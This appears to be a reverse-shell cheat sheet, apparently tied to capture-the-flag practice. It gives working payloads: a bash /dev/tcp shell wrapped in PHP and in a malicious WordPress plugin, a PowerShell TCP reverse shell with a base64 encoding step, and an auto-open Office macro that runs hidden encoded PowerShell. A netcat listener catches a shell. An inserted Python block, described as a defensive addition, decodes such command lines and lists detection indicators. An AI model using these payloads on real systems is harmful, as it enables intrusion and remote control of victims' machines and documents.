Reverse shells
(a work-in-progress list of some handy reverse shells)
ℹ️ Some nifty links
- generator
- cheatsheet
- another repo list
Opening
PHP
A generic PHP reverse shell where you can/should swap out the listening IP address and port:
```php
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.224/8080 0>&1'");
?>
```
WordPress
For a WordPress plugin, you need to add a bit more info for it to load as a “valid” plugin, as outlined in the plugin development docs.
```php
<?php
/**
 * Plugin Name: reverse shell plugin
 * Description: opens a reverse shell with bash
 * Version: 0.1
 * Author: some-natalie
 * Author URI: https://some-natalie.dev
 */
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.224/8080 0>&1'");
?>
```
Zip that PHP file, then upload the zipped file as a plugin.
This lovely malicious WordPress plugin generator works well on some versions of WordPress and not others. The boring one above works a bit more uniformly, but is nowhere near as full of features.
PowerShell
Edit the IP address and port, then encode it to base64 for easy copy/paste:
```powershell
$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.236",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$EncodedText = [Convert]::ToBase64String($Bytes)
$EncodedText
```
Office Macro
Here’s a basic macro that invokes powercat to create a reverse shell. Getting everything right for that payload is tedious, so I made a quick script (payload.py) to create the base64-encoded payload for a simple reverse shell. Then paste that content into the macro below. Make sure to save the macro attached to the document (not the workspace). Use .docm or .doc for Word, and the equivalent macro-enabled format for other Office document types.
```vb
Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Str As String
    ' edit the payload.py inputs to produce the right output here
    Str = Str + "powershell.exe -nop -w hidden -e SQBFAFgAKABOAGUAd"
    Str = Str + "uAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhA"
    Str = Str + "CAANAA0ADQANAAgAC0AZQAgAHAAbwB3AGUAcgBzAGgAZQBsAGw"
    Str = Str + "A"
    CreateObject("Wscript.Shell").Run Str
End Sub
```
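A defender-side counterpart to the PowerShell and macro sections above, added here as an example and not part of the original post: it reverses the UTF-16LE + base64 transform the encoding snippet performs, so a process command line of the shape the macro launches (`powershell.exe -nop -w hidden -e ...`) can be decoded and checked for the socket-plus-eval pattern. The sample script fragment, host address and indicator list are constructed for the example.

```python
import base64
import binascii
import re

# Constructed sample fragment (not the page's full one-liner): the typical start of
# a TCP reverse shell, which the encoding snippet above would wrap in base64.
SAMPLE_SCRIPT = ('$client = New-Object System.Net.Sockets.TCPClient("10.0.0.5",4444);'
                 '$stream = $client.GetStream()')

def encode_powershell(script):
    """Same transform as [Text.Encoding]::Unicode.GetBytes + [Convert]::ToBase64String."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# -e / -ec / -enc / -EncodedCommand: PowerShell accepts any unambiguous prefix of the flag.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HIDDEN_FLAG = re.compile(r"(?i)-(?:w|windowstyle)\s+hidden")

# Substrings that, in a decoded command, point at a socket-backed shell or remote code loading.
INDICATORS = ("System.Net.Sockets.TCPClient", "GetStream()", "/dev/tcp/",
              "Invoke-Expression", "iex ", "DownloadString")

def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand, or None if absent or not valid UTF-16LE base64."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def find_indicators(cmdline):
    """List the suspicious traits of one process command line (empty list = nothing flagged)."""
    hits = []
    if HIDDEN_FLAG.search(cmdline):
        hits.append("hidden window")
    script = decode_encoded_command(cmdline)
    if script is not None:
        hits.append("encoded command")
        lowered = script.lower()
        hits.extend(s for s in INDICATORS if s.lower() in lowered)
    return hits

if __name__ == "__main__":
    cmd = "powershell.exe -nop -w hidden -e " + encode_powershell(SAMPLE_SCRIPT)
    print(find_indicators(cmd))
```

Feed it the `CommandLine` field of process-creation events (Sysmon Event ID 1 or Security 4688 with command-line auditing enabled) rather than a single string to turn it into a detection.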
Catching
netcat
```text
ᐅ nc -l 8080
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@8b8f280a8848:/var/www/html/wp-admin$ cat /tmp/flag
cat /tmp/flag
flag{a sneaky flag has appeared}
```